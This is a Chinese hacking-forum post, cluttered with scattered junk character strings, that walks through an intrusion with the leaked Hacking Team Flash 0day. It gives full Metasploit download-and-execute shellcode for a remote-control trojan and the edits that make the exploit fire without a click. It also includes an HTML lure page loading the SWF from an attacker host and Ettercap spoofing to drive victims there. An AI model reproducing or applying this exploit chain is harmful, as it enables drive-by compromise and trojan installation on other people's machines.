找回密码
 立即注册
查看: 2357|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( Y% t) W: h) Q/ i2 ^ 三、flash 0day之手工代码修改制作下载者实例入侵演示 3 @) O/ a. w" }& H

+ R4 u" a. M! W: S

# A) m1 B. [ M% s1 f* } 利用到的工具: : s/ i, U* O8 @) e/ T

# g" d# f3 a3 s, |

; x$ h; Q% l, d) g1 h0 c" l- J Msf * C6 [# C' `- M% s

& T0 V+ o* L. L& q% i0 G9 S n

/ e* N- {5 ?6 ~' Q8 X; ? Ettercap 7 j; i, C3 C3 p$ E

* ^# r. a7 n- n- Q1 b. X

! U N5 e& \& A$ ^3 V" D Adobe Flash CS6 $ I4 U' X0 O1 d

! @" d6 W$ h& M

& S4 ^( P4 P; [ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 % k; I* S, D4 l+ c" v( Z4 X

7 d0 k7 ?6 S6 B+ j. x

0 `, J; b# f) f+ \3 F9 p5 V 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options " _# ~% o! U4 g5 m

( j+ q. k; X1 }& E

. d! M, X& L; }! a 如图: 0 y+ B5 L/ A9 S

; ?. U- U% O* q7 Y: p. j: @5 a

! p. B. m7 N4 j9 V9 N: h6 L   7 w& J* y5 T( e

7 h8 K2 }, h; j* r& {1 ~

* j+ `) C) H3 a0 A1 r' ~9 U   9 r6 e/ O. E+ d" Y$ T9 ^

) F3 N+ k4 x' j. p

L, p4 o/ B* A; @1 ^( i3 t! t 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + A4 z( s: [2 l7 s7 L Q; b2 W

; H+ T& z( O; t3 a, ?) z, e

& h6 v" s9 |% H- {5 h! H% v6 f6 S   $ u9 U1 `2 S( V; a% |

3 d& f2 C0 }. _4 T! g' D3 H' f" T% C, k

6 [/ ]6 ]) u8 r9 v5 D   # l7 i$ S% M% j, p5 I2 G3 y h* N

" B. q4 E9 R; u. }$ c/ h/ m

( f' a, P5 |" h' ]7 }% N; q 然后执行generate -t dword生成shellcode,如下: ; L% o7 b* T `3 E

+ j# [0 Z* g/ z" |

/ l) D5 d* x f   9 L. R# m a( ]& y

/ N. i6 o& @% Z

6 r; y3 P% t# \, r4 m1 l8 u/ m, [9 @ 复制代码到文本下便于我们一会编辑flash exp,如下: & E/ Q g: U& m- M& N0 \

/ J; d, S7 l$ L" M$ q2 H6 d5 j2 s/ n

8 W' Q D7 D1 U% A4 L/ v0 j4 f# a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, / T' g/ q' m. f' N9 ]& C

. I5 ]( M4 r4 t* _" z

( K, f- ~8 u( ^! h0 ~: u" a 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 2 e9 q+ ^( m$ u4 {& i( p5 q

2 _* o4 A9 D4 Y; w% b5 X

8 k+ O. `: T9 k5 ~* ^ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 8 {( p; m6 x x, ]

x$ B# H/ a. M0 ^4 W4 Z

2 Y9 o ?# X5 R% a: L& c 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + l5 ~; Z+ E& W; [4 W3 S* T$ J( M

; l+ W5 _7 I5 C, z. Q$ Q9 z

4 K3 K' V; O$ V& z# c 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / {2 _$ q7 t4 s. Y1 D* x

# ]; X u- H& }: ?7 U

& N, V9 e# _% ^! L 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, * H, T( A7 z/ v1 R4 `0 K9 a' w1 [

" f: W" v9 o& H% J7 P

8 m9 K) G, N) r 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 N5 W4 f* O5 i

7 f/ m! L& c2 t) r/ Q- n) {

; Y$ }& g3 o- H) O 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ' L( [& @$ X/ |

, z2 M; z5 u* f

, c; l6 w% q9 W" Z: `- F- | 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, _# [" }, }& c0 p1 Z* d

: E) h% |3 j( Z$ `4 Q: `8 [9 Z' @

- W2 f1 R) ^8 \ I0 k0 Z9 H 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : v9 j/ g0 y e/ m

4 F: Q3 F" n: W0 H1 Y( N; F! z$ H

+ F+ M$ T% O5 Q 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, . G5 y7 Q8 p! s' w9 V& ~/ {

0 K% ~ h8 M) `2 u; j

: T3 x7 H: {1 A: W/ v3 l! l( J 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ; ]" g" I; m' L$ j9 q

; R. L. Z) G& r

% |% b s- k* ?! r/ _ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 5 C6 E: e$ Y5 a4 C; j+ u5 D

8 t7 M: q T4 r2 O2 U- m! C0 ^

8 I$ H' R% A1 m! Y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 9 ]4 w; c0 {, ^+ y+ Z7 c

8 p- `* z, W5 U$ z! m

- N& K7 B {* R) M$ A6 p) r( ]   ; U l* V# }# S# p

. S% ]9 A0 z5 D% C+ C" O% U

2 @9 F0 I+ C6 L1 t8 g   * H% f% c% m: {# H7 H8 I

, j0 {" O6 w1 c" l7 E3 s

; f) R( E+ J9 S1 w3 Y 下面我们来修改flash 0day exp,需要修改三个文件,分别为: , W1 H' |; @0 }7 I# \6 \

- P' U# f' U! V3 V8 E$ @

7 R4 ?7 t8 B/ z   % }! R+ _7 q0 i$ r$ S0 b* }

- D) ^; S& u8 t6 D9 C" \" E, M

1 C% V9 @6 v5 p- H: t$ Z) p. V/ G6 k8 y 先修改ShellWin32.as,部分源代码如图: $ X' F1 @3 b/ i" I, N9 V3 i

! y( {- O, N- w, I( M& E

7 N6 d. z3 F! y0 v' h   & v" T8 R0 G/ ~; C; x5 Y! T8 P: s

4 V' A0 ~ r" n$ C' j& \

4 c( r- W+ ^6 a" s. i 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 A6 J3 D- Y | K

. n! ~( j4 K3 [: u' X

+ s3 Q3 `/ f7 B9 Z9 v9 g   ( t% e7 }" Q9 X' D* N2 w* O

( l( Q) s8 U6 Z" H4 I! [8 |- Y

/ Y% A) J+ F7 \% I5 q0 T' i 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: : `9 E. V. a- t$ ~! X4 S0 N

# X8 \& X1 [9 O8 A! H

. f1 G0 z1 Z; C) u6 l" u   " k* ]5 Y$ x. E* s6 h: w8 w) T* H

/ I. }. y# u9 p1 g+ K' ]+ f. u

6 c4 e0 [& R6 ^ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 8 v/ g+ F: J2 |

* [7 e* p0 @& t" I7 S

( E6 a% Q) H. n- n) @   8 S; b' O5 Q4 G/ Z2 P5 ^

2 O2 @+ M7 O# L

$ ~2 e+ {" A1 E; `' S& ?   3 y3 c2 L8 u5 v) Y0 e/ x

9 ~4 S; p/ n8 j" B- }, s D$ X+ \/ x

8 A% a5 Z+ e, K& Q+ w, T   N9 X* ^- V/ O9 A/ a& p6 K

Z" t/ f- _5 ?- W" N

. z: m- ^- ~0 d+ i2 R, J 然后点保存,下面我们来编译一下,打开 3 Y5 M2 x- U3 u

" ?( k/ b/ M4 n

: n( W$ x R4 |" |! x8 h' { exp1.fla然后点文件-发布,看看编译没错误 ; l5 j) }+ z1 Y5 x+ T5 R6 s

0 }% V" O) ]7 |4 T& w& s, P# F1 z3 a

7 U X( S8 i, u0 @ Q0 X   1 L* W' R7 i, x7 s* r4 O$ a

% k+ O6 H. T7 H1 p4 K

* K8 B( z2 R$ S% W1 r, T   3 r# }. u+ L; L; ^1 M( d

s$ g+ W1 c; d3 h, m) |5 T

+ I2 l. F: ?- ] `, I   + f. @. @6 i+ |) k( a, [

A. L" f' p) L L' I! x: H/ q

# n; s1 d, s9 X; I e8 i% h) F* M, `   " h7 K* s% l- y! U' ]

" `2 {$ t( z" ~ O; X, Q/ F p$ Y% u

2 ^" f2 X% z2 L% l0 N, e 然后我们把生成的 % T5 o* ?& q! C+ ~+ K

. M, X+ e) ~0 Q6 i0 k

( P9 x8 j* |) s* l+ F& h exp1.swf丢到kailinux /var/www/html下: 2 y) s5 W4 _- g6 R5 h) k* l0 v' l( v

+ P4 [' ]6 T5 v6 `* a$ `

: q( K/ V6 X& j+ Y0 }# ~ 然后把这段代码好好编辑一下 0 x0 M: N4 H; M9 f8 R; R3 z& e$ s

9 M6 u. h, z' w l$ e7 r* X/ e0 ^

8 `/ [3 n1 C/ m: V- q! a   z8 A9 X( D$ [6 z8 X, d* L

/ J, H: ~1 u1 n) P

& r; x( S# q3 g: e# L1 L" ?   ! P6 c% ^3 R5 O, n8 c

) I0 D1 ]4 }* F: i7 h

8 z2 |5 W3 o9 _) H0 k   8 C( b" t4 `( [" w

% \: ~4 r* E1 `

/ }% b/ D+ u- x. d$ _2 {# A. [   0 Z Y& f; l4 S. x3 a8 E8 Y& l3 W( g

, O5 O* ` L. I) R( y7 j2 @( ~& ~

) N7 U: J) C& S# v6 K   : M4 H- V3 v/ T3 B

0 Y% T8 t# J' R. H0 R$ y$ z M

/ P1 Z6 |1 Q+ G5 Q+ V' w   ) d! ~/ ]; ^, G3 l: D$ ?7 g9 _

( G* X( R. o9 J5 y' z+ I

9 z' G+ Z% n$ x <!DOCTYPE html> : q+ N8 A5 |# [" u' Z8 B: Y9 A

* d# ] S: n# }- B3 @2 B: n

' [" O. D5 U+ W& ^8 \% P7 _ <html> 0 ?+ c+ N- W7 z- }- ~& h2 n) r5 ~

% \- G5 d7 Z( H. z! } [" I

/ ?% r1 O/ K/ A4 m4 ^3 f <head> * p! Q( f6 @0 @

. ?" ?! v9 I, M& M0 k8 p

! `7 M1 @! x( W! c% K% ^ <meta http-equiv="Content-Type" content="text/html; ; ~4 B0 ~2 l+ c: p0 P

* {" V |! B; u2 S" _

3 e0 f8 ?3 K: h0 _- A' _- J charset=utf-8"/> . H3 u& h8 j" f6 C& @

8 I* K* @2 b! k' {+ H) C# R8 H

! F) ?. ?! G. t! Y </head> . h: k4 U+ h& i" m% H* {

3 i p2 d' Y; V7 z1 J* s6 f

1 U5 v9 V1 q5 S8 f3 M s, b <body> # ]' h2 d# ~: w& D

9 D/ }* S& D5 W+ n/ g- s" L9 ~

. I: }- ?0 U, t. U5 X <h2> Please wait, the requested page is loading...</h2> , h9 h4 ~! n! I8 C: Z+ C6 k. F

6 J6 Z1 R) H0 _( l4 K

' [# Z9 N5 C3 S A- a <br> , A' A( j) j: t$ D4 w i2 i! P

* I" L/ @! q+ x# g8 ]

! h* r* p: m) s <OBJECT $ p2 p2 Z: x/ s. V5 p' b9 a

6 g6 P' S5 M0 d' Y" C T

' l+ B# U/ t2 G2 m6 B6 I( w0 O classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 0 Q/ f. c0 s3 [$ M

6 L5 A/ D. c2 A b0 F

1 T) N! ^; c; v) {2 g8 r VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 U$ P1 T2 A$ c$ z# i8 j% `

1 D7 z" ]; \$ A9 a

3 E+ {: R% ~' P& [$ m" }8 J </body> 5 L0 p# c0 o" Z

( k, |% r+ H& ^# L

/ \. F& Z$ i, ?: R <script> v) P' V+ q: x

4 M# r, k3 v6 ^" }( y: \4 B

6 _. I: E* B; y) @     setTimeout(function () { & P' [8 Q- b$ l/ K; ~" K

9 B1 b- W8 B% A) B# u) F. N9 ?

1 Z. H0 }% x3 J: H          0 V6 H6 R8 _. a. y3 f n7 X

0 I6 O! M- R, J9 c( P, A

6 Q" [# s( W2 d1 ^- b" a window.location.reload(); 8 g# m, [% L- f: s* K/ Y

0 k. F# m# P: L" R! v5 K t

/ L4 V% Q( f$ p# `( @6 `     }, 10000); ' I" a4 w' O6 H* S! E m

( @* T% b l4 V' f, Q

4 {) k& z/ z1 t) N   % f5 k3 t; `! u, B `. ~

7 j4 W1 L, f4 ^9 w

* Z" F8 R/ ?0 }5 P( e! Q </script> 5 c4 t3 u6 I- W7 M# @; S7 u2 I

) J* @, v. r' L, k# u

/ {+ m# K. L+ U0 V6 L% { </html> 6 T) m% h7 d0 j0 W7 l6 t2 U

4 P) L q; d% O5 }% q- M, n5 k

% A. P, A+ o [7 W8 D   1 Q" k4 x5 V" e, {0 j' }+ {

5 u* z, e l" z1 ?3 m N7 K* R

) D0 [' _" F+ O2 s5 y6 ^) ` 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: $ z" M& j" ` q* Z$ r C! g

, l7 @# o3 C7 H2 a& r) s

( U8 ?" g% B4 ~0 b2 R   ( T/ e2 [: i& x; ^

7 k0 G1 N6 b+ O

6 @. X* ~( ^. G! D   8 E* y4 f; [5 o$ H. B

4 T' u" B* P1 g! N( z5 ?

$ h1 q6 ~; F1 b- u( u) r   , c( A" J2 @& e f4 b

6 b% z$ N) Q9 |% b. @9 c* Z: J

8 e* \0 F9 p' p. i   . G8 D+ X& m+ u1 q0 V

3 N: ]8 `" q$ y0 D; h

8 F( a5 `+ T( a; p+ j7 t/ K& v   : l2 m" N! N+ P$ T

; T; A& m4 S; i6 @: \ @

7 j9 p) J [% D# O; o n, c0 c& Z 下面我们用ettercap欺骗如图: 8 }7 U4 K$ k1 r" S% k/ ]

9 P. F' d+ v% `6 F

; `3 i8 U, a7 r+ {/ e1 @; N   # ~; |3 W+ S; l" L9 d, y% [4 I

- q3 F/ E3 b9 v" d5 a

* m# ]4 z; x- E; w3 m   * {9 u% t3 W3 m& z& u; j

3 \7 q6 U& ]. j5 j" N B

, \3 V" O% \6 U 下面我们随便访问个网站看看: . b0 s7 ~# u" f" d5 J! {& G; T

7 c( g6 y. F: F

% Y: |3 k( V( { q 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 7 l) `* j* Q9 E# G+ `! ^4 S- x7 b

8 F4 H( v5 f1 H5 T, g( h) H

% x1 S" L. ~5 p   1 q6 O. J3 A# R* ^$ x8 q

! }' G' Q9 y$ U+ h! o

* i9 ^, _9 @' h- X3 _. S 我们看另一台, 3 K' k7 H2 @) [, @. i9 g5 z

: r! a4 p/ u# G3 W

) D5 J5 j! K2 Q/ N 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 4 L* I. ?9 P; r& t2 T- z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表